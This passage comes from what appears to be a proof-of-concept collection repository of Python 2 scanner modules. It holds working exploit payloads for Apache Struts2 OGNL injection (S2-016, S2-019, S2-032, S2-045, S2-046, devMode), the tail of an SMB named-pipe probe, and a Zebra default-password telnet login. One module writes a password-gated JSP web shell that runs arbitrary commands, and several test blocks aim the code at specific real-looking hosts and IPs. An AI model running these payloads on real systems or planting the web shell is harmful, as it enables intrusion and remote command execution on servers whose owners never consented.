61 | data = s.recv(1024) 62 | user_id = data[32:34] 63 | session_setup_request_2 = binascii.unhexlify( 64 | 
"00000150ff534d4273000000001801280000000000000000000000000000729c" + binascii.hexlify( 65 | user_id) + "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") 66 | s.send(session_setup_request_2) 67 | s.recv(1024) 68 | session_setup_request_3 = binascii.unhexlify( 69 | "00000063ff534d4273000000001801200000000000000000000000000000729c0000c4e10dff000000dfff02000100000000000000000000000000400000002600002e0057696e646f7773203230303020323139350057696e646f7773203230303020352e3000") 70 | s.send(session_setup_request_3) 71 | data = s.recv(1024) 72 | tree_id = data[32:34] 73 | smb = self.get_tree_connect_request(ip, tree_id) 74 | s.send(smb) 75 | s.recv(1024) 76 | poc = binascii.unhexlify( 77 | "0000004aff534d422500000000180128000000000000000000000000" + binascii.hexlify( 78 | user_id) + "729c" + binascii.hexlify( 79 | tree_id) + "c4e11000000000ffffffff0000000000000000000000004a0000004a0002002300000007005c504950455c00") 80 | s.send(poc) 81 | data = s.recv(1024) 82 | if "\x05\x02\x00\xc0" in data: 83 | return True 84 | return False 85 | except: 86 | return False 87 | finally: 88 | if s is not None: 89 | s.close() 90 | if __name__ == '__main__': 91 | # print P().verify(ip='61.146.115.83',port='81') 92 | print P().verify(ip='121.41.28.130', port='445') 93 | -------------------------------------------------------------------------------- /component/smb/t.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | 4 | 5 | class T(object): 6 | def __init__(self): 7 | 8 | self.result = { 9 | 'type': None, 10 | 'version': None, 11 | } 12 | self.keywords = [] 13 | self.versions = [] 14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw): 15 | ## 16 | #head 返回的请求头 17 | #context 返回请求正文html代码 18 | #ip 请求ip 19 | #port 请求端口 20 | #productname 请求的组件产品 21 | #keywords 暂时已知的关键词组件 22 | #hackinfo 备用字段 23 | 24 | 25 | 26 | 27 | return True 28 | 29 | def 
verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 30 | result = {} 31 | result['result']=False 32 | return result 33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 34 | result = {} 35 | result['result']=False 36 | return result 37 | def parse_output(self, result): 38 | result = {} 39 | result['result']=False 40 | return result -------------------------------------------------------------------------------- /component/struts/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | KEYWORDS = ['struts', ] 3 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 4 | if 'struts2' in context or '.action' in context or '.do' in context: 5 | return True 6 | else: 7 | 8 | return False 9 | 10 | 11 | -------------------------------------------------------------------------------- /component/struts/script/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/component/struts/script/__init__.py -------------------------------------------------------------------------------- /component/struts/script/linktool.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | import urlparse 4 | import re 5 | from bs4 import BeautifulSoup 6 | 7 | """ 8 | BeautifulSoup: 9 | encoding error : input conversion failed due to input error, bytes 0x9E 0x65 0xBA 0xD3 10 | """ 11 | def format_html(html,charset=''): 12 | def get_charset(html): 13 | if html[0:3] == '\xef\xbb\xbf': 14 | return 'UTF-8' 15 | match = re.search('', html, re.IGNORECASE) 16 | if match: 17 | return match.group(1) 18 | return 'GB18030' 19 | 20 | def convert_to_unicode(content): 21 | if isinstance(content, str): 22 | try: 23 | return force_convert_cn(content) 24 
| except UnicodeDecodeError as e: 25 | print(e) 26 | return content 27 | 28 | def force_convert_cn(content,charset=''): 29 | if not charset == '': 30 | return content.decode(charset, 'ignore') 31 | try_list = ["UTF-8", "GB18030", "BIG5"] 32 | for codec in try_list: 33 | try: 34 | decoded = content.decode(codec) 35 | return decoded 36 | except UnicodeDecodeError as e: 37 | continue 38 | charset = get_charset(content) 39 | decoded = content.decode(charset, 'ignore') 40 | return decoded 41 | 42 | def html_entity_decode(html): 43 | try: 44 | import HTMLParser 45 | parser = HTMLParser.HTMLParser() 46 | return parser.unescape(html) 47 | except: 48 | return html 49 | 50 | #html = html_entity_decode(html) 51 | html = convert_to_unicode(html) 52 | return html 53 | 54 | class LinksParser(object): 55 | """docstring for link_parser""" 56 | def __init__(self, baseurl, html_content): 57 | super(LinksParser, self).__init__() 58 | self.weburl = self.baseurl = baseurl 59 | self.html_content = format_html(html_content) 60 | self.url_links = { 61 | 'a':[], 62 | 'link':[], 63 | 'img':[], 64 | 'script':[], 65 | 'form':[], 66 | 'location':[], 67 | } 68 | self.external_links = [] 69 | self.internal_links = [] 70 | self.soup = BeautifulSoup(self.html_content, 'lxml') 71 | self.get_baseurl() 72 | 73 | def get_baseurl(self): 74 | tag = self.soup.find('base') 75 | if tag and tag.attrs.has_key('href'): 76 | if not urlparse.urlparse(tag.attrs['href']).netloc == '': 77 | self.baseurl = tag.attrs['href'] 78 | return self.baseurl 79 | 80 | def complet_url(self, link): 81 | if link.startswith('/') or link.startswith('.'): 82 | return urlparse.urljoin(self.baseurl, link) 83 | elif link.startswith('http') or link.startswith('https'): 84 | return link 85 | else: 86 | return urlparse.urljoin(self.baseurl, link) 87 | #return False 88 | 89 | def getall(self): 90 | self.get_tag_a() 91 | self.get_tag_link() 92 | self.get_tag_img() 93 | self.get_tag_script() 94 | self.get_tag_form() 95 | 
self.get_tag_location() 96 | # links 去重 97 | for child in self.url_links.keys(): 98 | self.url_links[child] = list(set(self.url_links[child])) 99 | return self.url_links 100 | 101 | def get_tag_a(self): 102 | # 处理A链接 103 | for tag in self.soup.find_all('a'): 104 | if tag.attrs.has_key('href'): 105 | link = tag.attrs['href'] 106 | # link = urlparse.urldefrag(tag.attrs['href'])[0] # 处理掉#tag标签信息 107 | complet_link = self.complet_url(link.strip()) 108 | if complet_link: 109 | self.url_links['a'].append(complet_link) 110 | return self.url_links 111 | 112 | def get_tag_link(self): 113 | # 处理link链接资源 114 | for tag in self.soup.find_all('link'): 115 | if tag.attrs.has_key('href'): 116 | link = tag.attrs['href'] 117 | complet_link = self.complet_url(link.strip()) 118 | if complet_link: 119 | self.url_links['link'].append(complet_link) 120 | return self.url_links 121 | 122 | def get_tag_img(self): 123 | for tag in self.soup.find_all('img'): 124 | if tag.attrs.has_key('src'): 125 | link = tag.attrs['src'] 126 | complet_link = self.complet_url(link.strip()) 127 | if complet_link: 128 | self.url_links['img'].append(complet_link) 129 | return self.url_links 130 | 131 | def get_tag_script(self): 132 | for tag in self.soup.find_all('script'): 133 | if tag.attrs.has_key('src'): 134 | link = tag.attrs['src'] 135 | complet_link = self.complet_url(link.strip()) 136 | if complet_link: 137 | self.url_links['script'].append(complet_link) 138 | return self.url_links 139 | 140 | def get_tag_location(self): 141 | for tag in self.soup.find_all('script'): 142 | text = tag.get_text() 143 | match = re.search('location(\.href)?\s*?=\s*?[\'"](.*?)[\'"]',text,re.IGNORECASE) 144 | if match: 145 | link = match.group(2) 146 | complet_link = self.complet_url(link.strip()) 147 | if complet_link: 148 | self.url_links['location'].append(complet_link) 149 | return self.url_links 150 | 151 | def get_tag_form(self): 152 | for tag in self.soup.find_all('form'): 153 | if tag.attrs.has_key('action'): 154 | 
link = tag.attrs['action'] 155 | complet_link = self.complet_url(link.strip()) 156 | if complet_link: 157 | self.url_links['form'].append(complet_link) 158 | return self.url_links 159 | 160 | def get_links_internal(self): 161 | b = self.getall() 162 | for a in b: 163 | for i in b[a]: 164 | p = urlparse.urlparse(i) 165 | if p.netloc == urlparse.urlparse(self.weburl).netloc: 166 | self.internal_links.append(i) 167 | else: 168 | continue 169 | return self.internal_links 170 | 171 | def get_links_external(self): 172 | for i in self.getall()['a']: 173 | p = urlparse.urlparse(i) 174 | if p.netloc == urlparse.urlparse(self.weburl).netloc: 175 | continue 176 | else: 177 | self.external_links.append(i) 178 | return self.external_links 179 | 180 | def getaction(url): 181 | import requests 182 | baseurl = url 183 | links = [] 184 | 185 | resp=None 186 | try: 187 | resp = requests.get(url,timeout=20) 188 | content = resp.content 189 | baseurl = resp.url 190 | 191 | links = LinksParser(baseurl,content).get_links_internal() 192 | except: 193 | pass 194 | finally: 195 | if resp is not None: 196 | resp.close() 197 | ret=[] 198 | if len(links)>0: 199 | ret = filter(fun1, links) 200 | 201 | return ret 202 | 203 | def fun1(s): 204 | if '.action' in s or '.do' in s: 205 | return s 206 | else: 207 | return None 208 | if __name__ == "__main__": 209 | print getaction('http://www:8089/zhxxgl') -------------------------------------------------------------------------------- /component/struts/struts032test.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | from ..t import T 4 | # from t import T 5 | import requests 6 | class P(T): 7 | def __init__(self): 8 | T.__init__(self) 9 | keywords=['struts'] 10 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 11 | target_url = '' 12 | target_url = 'http://' + ip + ':' + port 13 | 14 | if productname.get('path', ''): 15 | 
target_url = 'http://' + ip + ':' + port + productname.get('path', '') 16 | else: 17 | from script import linktool 18 | listarray = linktool.getaction(target_url) 19 | if len(listarray) > 0: 20 | target_url = listarray[0] 21 | else: 22 | target_url = 'http://' + ip + ':' + port + '/login.action' 23 | result = {} 24 | timeout=3 25 | result['result']=False 26 | res=None 27 | payload = "method:%23_memberAccess%[email]3d@ognl.OgnlContext[/email]@DEFAULT_MEMBER_ACCESS,%23w%3d%23context.get(%23parameters.rpsobj[0]),%23w.getWriter().println(88888888-1),%23w.getWriter().flush(),%23w.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse" # 28 | 29 | print target_url 30 | try: 31 | headers = {"Content-Type":"application/x-www-form-urlencoded"} 32 | r = requests.post(target_url,data=payload,headers=headers,timeout=5) 33 | res_html = r.text 34 | except Exception,e: 35 | print e 36 | return result 37 | finally: 38 | if res is not None: 39 | res.close() 40 | del res 41 | 42 | 43 | if res_html.find("88888887") <> -1: 44 | 45 | 46 | info = target_url + "struts032 Vul" 47 | result['result']=True 48 | result['VerifyInfo'] = {} 49 | result['VerifyInfo']['type']='struts032 Vul' 50 | result['VerifyInfo']['URL'] =target_url 51 | result['VerifyInfo']['payload']=payload 52 | result['VerifyInfo']['result'] =info 53 | return result 54 | return result 55 | 56 | if __name__ == '__main__': 57 | print P().verify(ip='gimssom.bnuz.edu.cn',port='8089') 58 | 59 | 60 | 61 | -------------------------------------------------------------------------------- /component/struts/struts045.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | # from ..t import T 4 | from t import T 5 | import requests 6 | class P(T): 7 | def __init__(self): 8 | T.__init__(self) 9 | keywords=['struts'] 10 | def 
verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 11 | target_url = '' 12 | target_url = 'http://' + ip + ':' + port 13 | 14 | if productname.get('path', ''): 15 | target_url = 'http://' + ip + ':' + port + productname.get('path', '') 16 | else: 17 | from script import linktool 18 | listarray = linktool.getaction(target_url) 19 | if len(listarray) > 0: 20 | target_url = listarray[0] 21 | else: 22 | target_url = 'http://' + ip + ':' + port + '/login.action' 23 | 24 | result = {} 25 | timeout=3 26 | result['result']=False 27 | res=None 28 | payload = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println('123456789')).(#o.close())}" 29 | print target_url 30 | try: 31 | headers = {"Content-Type":payload} 32 | r = requests.get(target_url,headers=headers,timeout=5) 33 | res_html = r.text 34 | except Exception,e: 35 | print e 36 | return result 37 | finally: 38 | if res is not None: 39 | res.close() 40 | del res 41 | 42 | if res_html.find("123456789") <> -1: 43 | 44 | 45 | info = target_url + "struts045 Vul" 46 | result['result']=True 47 | result['VerifyInfo'] = {} 48 | result['VerifyInfo']['type']='struts045 Vul' 49 | result['VerifyInfo']['URL'] =target_url 50 | result['VerifyInfo']['payload']=payload 51 | result['VerifyInfo']['result'] =info 52 | return result 53 | return result 54 | 55 | if __name__ == '__main__': 56 | print P().verify(ip='www',port='8089') 57 | 58 | 59 | 60 | -------------------------------------------------------------------------------- /component/struts/struts2016.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | from t import T 4 | 5 | import requests 6 | class P(T): 7 | def __init__(self): 8 | T.__init__(self) 9 | keywords=['struts'] 10 | def 
verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 11 | target_url='' 12 | target_url = 'http://' + ip + ':' + port 13 | 14 | if productname.get('path',''): 15 | target_url = 'http://'+ip+':'+port+productname.get('path','') 16 | else: 17 | from script import linktool 18 | listarray=linktool.getaction(target_url) 19 | if len(listarray)>0: 20 | target_url=listarray[0] 21 | else: 22 | target_url = 'http://'+ip+':'+port+'/login.action' 23 | result = {} 24 | timeout=3 25 | result['result']=False 26 | res=None 27 | payload = "redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}" 28 | 29 | print target_url 30 | try: 31 | headers = {"Content-Type":"application/x-www-form-urlencoded"} 32 | r = requests.post(target_url,data=payload,headers=headers,timeout=5) 33 | res_html = r.text 34 | except Exception,e: 35 | print e 36 | return result 37 | finally: 38 | if res is not None: 39 | res.close() 40 | del res 41 | 42 | if res_html.find("88888887") <> -1: 43 | 44 | 45 | info = target_url + "struts016 Vul" 46 | result['result']=True 47 | result['VerifyInfo'] = {} 48 | result['VerifyInfo']['type']='struts016 Vul' 49 | result['VerifyInfo']['URL'] =target_url 50 | result['VerifyInfo']['payload']=payload 51 | result['VerifyInfo']['result'] =info 52 | return result 53 | return result 54 | 55 | if __name__ == '__main__': 56 | print P().verify(ip='116.213.171.228',port='80') 57 | 58 | 59 | 60 | 
-------------------------------------------------------------------------------- /component/struts/struts2019.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | # from ..t import T 4 | from t import T 5 | import requests 6 | class P(T): 7 | def __init__(self): 8 | T.__init__(self) 9 | keywords=['struts'] 10 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 11 | target_url = '' 12 | target_url = 'http://' + ip + ':' + port 13 | 14 | if productname.get('path', ''): 15 | target_url = 'http://' + ip + ':' + port + productname.get('path', '') 16 | else: 17 | from script import linktool 18 | listarray = linktool.getaction(target_url) 19 | if len(listarray) > 0: 20 | target_url = listarray[0] 21 | else: 22 | target_url = 'http://' + ip + ':' + port + '/login.action' 23 | 24 | result = {} 25 | timeout=3 26 | result['result']=False 27 | res=None 28 | payload = "debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()" 29 | 30 | print target_url 31 | try: 32 | headers = {"Content-Type":"application/x-www-form-urlencoded"} 33 | r = requests.post(target_url,data=payload,headers=headers,timeout=5) 34 | res_html = r.text 35 | except Exception,e: 36 | print e 37 | return result 38 | finally: 39 | if res is not None: 40 | res.close() 41 | del res 42 | 43 | if res_html.find("88888887") <> -1: 44 | 45 | 46 | info = target_url + "struts019 Vul" 47 | 
result['result']=True 48 | result['VerifyInfo'] = {} 49 | result['VerifyInfo']['type']='struts019 Vul' 50 | result['VerifyInfo']['URL'] =target_url 51 | result['VerifyInfo']['payload']=payload 52 | result['VerifyInfo']['result'] =info 53 | return result 54 | return result 55 | 56 | if __name__ == '__main__': 57 | print P().verify(ip='www',port='8089') 58 | 59 | 60 | 61 | -------------------------------------------------------------------------------- /component/struts/struts2032.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | from ..t import T 4 | import random,urllib2 5 | class P(T): 6 | def __init__(self): 7 | T.__init__(self) 8 | keywords=['struts'] 9 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 10 | target_url = '' 11 | target_url = 'http://' + ip + ':' + port 12 | 13 | if productname.get('path', ''): 14 | target_url = 'http://' + ip + ':' + port + productname.get('path', '') 15 | else: 16 | from script import linktool 17 | listarray = linktool.getaction(target_url) 18 | if len(listarray) > 0: 19 | target_url = listarray[0] 20 | else: 21 | target_url = 'http://' + ip + ':' + port + '/login.action' 22 | result = {} 23 | timeout=3 24 | result['result']=False 25 | res=None 26 | jsp_file = str(random.randint(1000, 1000000)) + '.jsp' 27 | content = 'gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.' 
\ 28 | 'getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%2' \ 29 | '0%20java.io.InputStream%20in%20%3D%20Runtime.getRuntime%28%' \ 30 | '29.exec%28request.getParameter%28%22l%22%29%29.getInputStre' \ 31 | 'am%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%3D%20-1%3B' \ 32 | '%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%3D%20new%20byt' \ 33 | 'e%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3C' \ 34 | 'pre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%3Din' \ 35 | '.read%28b%29%29%21%3D-1%29%7B%0A%20%20%20%20%20%20%20%20%20' \ 36 | '%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%2' \ 37 | '0%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%' \ 38 | '22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E' 39 | 40 | poc_url = "{url}?method:%23_memberAccess%3d@ognl.OgnlContext" \ 41 | "@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0]," \ 42 | "%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a)," \ 43 | "%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23" \ 44 | "fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23para" \ 45 | "meters.content[0].getBytes()),%23fos.close(),%23hh%3d%23conte" \ 46 | "xt.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23" \ 47 | "b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23x" \ 48 | "x:%23request.toString&reqobj=com.opensymphony.xwork2.dispatch" \ 49 | "er.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatch" \ 50 | "er.HttpServletResponse&reqobj=%2f&reqobj=(unknown)&content={" \ 51 | "content}".format(url=target_url, filename=jsp_file, content=content) 52 | print target_url 53 | try: 54 | res=urllib2.urlopen(poc_url,timeout=timeout) 55 | res_html = res.read() 56 | except Exception,e: 57 | print e 58 | return result 59 | finally: 60 | if res is not None: 61 | res.close() 62 | del res 63 | if jsp_file in res_html: 64 | info = target_url + "struts032 Vul" 65 | result['result']=True 66 | result['VerifyInfo'] = {} 67 | 
result['VerifyInfo']['type']='struts032 Vul' 68 | result['VerifyInfo']['URL'] =target_url 69 | result['VerifyInfo']['payload']=poc_url 70 | result['VerifyInfo']['result'] =info 71 | return result 72 | return result 73 | 74 | if __name__ == '__main__': 75 | print P().verify(ip='www.htzai.com',port='80') 76 | 77 | 78 | 79 | -------------------------------------------------------------------------------- /component/struts/struts2046.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | # from ..t import T 4 | from t import T 5 | import random 6 | import base64 7 | import sys 8 | import urllib2 9 | class P(T): 10 | def __init__(self): 11 | T.__init__(self) 12 | keywords=['struts'] 13 | def make_s2_046_payload(self,command): 14 | payload_l = base64.decodestring(u'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') 15 | payload_r = base64.decodestring(u'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') 16 | end_null_byte = '0063'.decode('hex') 17 | payload = payload_l + command + payload_r + end_null_byte 18 | return payload 19 | 20 | 21 | def exec_s2_046_payload(self,url=None, payload=None): 22 | user_agent = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)' 23 | header_payload = 'multipart/form-data; boundary=---------------------------735323031399963166993862150' 24 | headers = {'User-Agent': user_agent, 25 | 'Content-Type': header_payload} 26 | body_payload = '''-----------------------------735323031399963166993862150\r\nContent-Disposition: form-data; name="foo"; filename="{0}"\r\nContent-Type: text/plain\r\n\r\nx\r\n-----------------------------735323031399963166993862150--'''.format(payload) 27 | response=None 28 | result='' 29 | try: 30 | req = urllib2.Request(url, headers=headers,data=body_payload) 31 | response = urllib2.urlopen(req) 32 | except Exception as e: 33 | print e 34 | else: 35 | result = response.read() 36 | finally: 37 | if response is not None: 38 | 
response.close() 39 | return result 40 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 41 | target_url = '' 42 | target_url = 'http://' + ip + ':' + port 43 | 44 | if productname.get('path', ''): 45 | target_url = 'http://' + ip + ':' + port + productname.get('path', '') 46 | else: 47 | from script import linktool 48 | listarray = linktool.getaction(target_url) 49 | if len(listarray) > 0: 50 | target_url = listarray[0] 51 | else: 52 | target_url = 'http://' + ip + ':' + port + '/login.action' 53 | 54 | result = {} 55 | timeout=3 56 | result['result']=False 57 | res=None 58 | s=None 59 | 60 | 61 | try: 62 | randint1 = str(random.randint(1000, 10000)) 63 | payload = self.make_s2_046_payload('echo X-Test-'+randint1) 64 | temp_result = self.exec_s2_046_payload(target_url, payload) 65 | 66 | if 'X-Test-%s' % (randint1) in temp_result: 67 | info = target_url + "struts046 Vul" 68 | result['result']=True 69 | result['VerifyInfo'] = {} 70 | result['VerifyInfo']['type']='struts046 Vul' 71 | result['VerifyInfo']['URL'] =target_url 72 | result['VerifyInfo']['payload']=payload 73 | result['VerifyInfo']['result'] =info 74 | return result 75 | 76 | except Exception,e: 77 | print e 78 | return result 79 | finally: 80 | if s is not None: 81 | s.close() 82 | del s 83 | 84 | 85 | 86 | # return result 87 | 88 | if __name__ == '__main__': 89 | print P().verify(ip='www.healthmanage.cn',port='80') 90 | -------------------------------------------------------------------------------- /component/struts/struts2devmode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | # from ..t import T 4 | from t import T 5 | import requests 6 | class P(T): 7 | def __init__(self): 8 | T.__init__(self) 9 | keywords=['struts'] 10 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 11 | target_url = '' 12 | target_url = 'http://' + ip + ':' + 
port 13 | 14 | if productname.get('path', ''): 15 | target_url = 'http://' + ip + ':' + port + productname.get('path', '') 16 | else: 17 | from script import linktool 18 | listarray = linktool.getaction(target_url) 19 | if len(listarray) > 0: 20 | target_url = listarray[0] 21 | else: 22 | target_url = 'http://' + ip + ':' + port + '/login.action' 23 | 24 | result = {} 25 | timeout=3 26 | result['result']=False 27 | res=None 28 | payload = "debug=browser&object=(%23mem=%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789" 29 | 30 | print target_url 31 | try: 32 | headers = {"Content-Type":"application/x-www-form-urlencoded"} 33 | r = requests.post(target_url,data=payload,headers=headers,timeout=5) 34 | res_html = r.text 35 | except Exception,e: 36 | print e 37 | return result 38 | finally: 39 | if res is not None: 40 | res.close() 41 | del res 42 | 43 | if res_html.find("123456789") <> -1: 44 | 45 | 46 | info = target_url + "strutsdevmode Vul" 47 | result['result']=True 48 | result['VerifyInfo'] = {} 49 | result['VerifyInfo']['type']='strutsdevmode Vul' 50 | result['VerifyInfo']['URL'] =target_url 51 | result['VerifyInfo']['payload']=payload 52 | result['VerifyInfo']['result'] =info 53 | return result 54 | return result 55 | 56 | if __name__ == '__main__': 57 | print P().verify(ip='www',port='8089') 58 | 59 | 60 | 61 | -------------------------------------------------------------------------------- /component/struts/t.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | 4 | 5 | class T(object): 6 | def __init__(self): 7 | 8 | self.result = { 9 | 'type': None, 10 | 'version': None, 11 | } 12 | self.keywords = [] 13 | self.versions = [] 14 | def 
match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw): 15 | ## 16 | #head 返回的请求头 17 | #context 返回请求正文html代码 18 | #ip 请求ip 19 | #port 请求端口 20 | #productname 请求的组件产品 21 | #keywords 暂时已知的关键词组件 22 | #hackinfo 备用字段 23 | 24 | 25 | 26 | 27 | return True 28 | 29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 30 | result = {} 31 | result['result']=False 32 | return result 33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 34 | result = {} 35 | result['result']=False 36 | return result 37 | def parse_output(self, result): 38 | result = {} 39 | result['result']=False 40 | return result -------------------------------------------------------------------------------- /component/t.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | 4 | 5 | class T(object): 6 | def __init__(self): 7 | 8 | self.result = { 9 | 'type': None, 10 | 'version': None, 11 | } 12 | self.keywords = [] 13 | self.versions = [] 14 | 15 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw): 16 | ## 17 | #head 返回的请求头 18 | #context 返回请求正文html代码 19 | #ip 请求ip 20 | #port 请求端口 21 | #productname 请求的组件产品 22 | #keywords 暂时已知的关键词组件 23 | #hackinfo 备用字段 24 | 25 | 26 | 27 | 28 | return True 29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 30 | result = {} 31 | result['result']=False 32 | return result 33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 34 | result = {} 35 | result['result']=False 36 | return result 37 | def parse_output(self, result): 38 | result = {} 39 | result['result']=False 40 | return result -------------------------------------------------------------------------------- /component/test/__init__.py: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/component/test/__init__.py -------------------------------------------------------------------------------- /component/zebra/__init__.py: -------------------------------------------------------------------------------- 1 | KEYWORDS = ['zebra', ] 2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 3 | 4 | 5 | if 'zebra' in port : 6 | return True 7 | else: 8 | 9 | return False -------------------------------------------------------------------------------- /component/zebra/a.out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/component/zebra/a.out -------------------------------------------------------------------------------- /component/zebra/t.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | 4 | 5 | class T(object): 6 | def __init__(self): 7 | 8 | self.result = { 9 | 'type': None, 10 | 'version': None, 11 | } 12 | self.keywords = [] 13 | self.versions = [] 14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw): 15 | ## 16 | #head 返回的请求头 17 | #context 返回请求正文html代码 18 | #ip 请求ip 19 | #port 请求端口 20 | #productname 请求的组件产品 21 | #keywords 暂时已知的关键词组件 22 | #hackinfo 备用字段 23 | 24 | 25 | 26 | 27 | return True 28 | 29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 30 | result = {} 31 | result['result']=False 32 | return result 33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 34 | result = {} 35 | result['result']=False 36 | return result 37 | def parse_output(self, result): 38 | result = {} 39 | 
result['result']=False 40 | return result -------------------------------------------------------------------------------- /component/zebra/zebradefaultpass.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | from t import T 4 | import os 5 | import platform 6 | import subprocess 7 | import signal 8 | import time 9 | import requests,urllib2,json,urlparse 10 | 11 | import pexpect 12 | 13 | class P(T): 14 | def __init__(self): 15 | T.__init__(self) 16 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 17 | 18 | result = {} 19 | result['result']=False 20 | cmd=None 21 | passwd='zebra' 22 | i=0 23 | cmd = pexpect.spawn('telnet %s %s' %(ip,port) ) 24 | try: 25 | 26 | i = cmd.expect(['Password:','Connection refused'], timeout=2) 27 | if i==1: 28 | return result 29 | cmd.sendline(passwd) 30 | 31 | i = cmd.expect(['Incorrect','>'], timeout=2) 32 | if i == 0: 33 | return result 34 | 35 | 36 | 37 | 38 | result['result'] = True 39 | result['VerifyInfo'] = {} 40 | result['VerifyInfo']['type'] = 'weak pass' 41 | result['VerifyInfo']['URL'] = ip + ':' + port 42 | result['VerifyInfo']['payload'] = passwd 43 | result['VerifyInfo']['result'] = 'pass is %s'% passwd 44 | 45 | except pexpect.EOF: 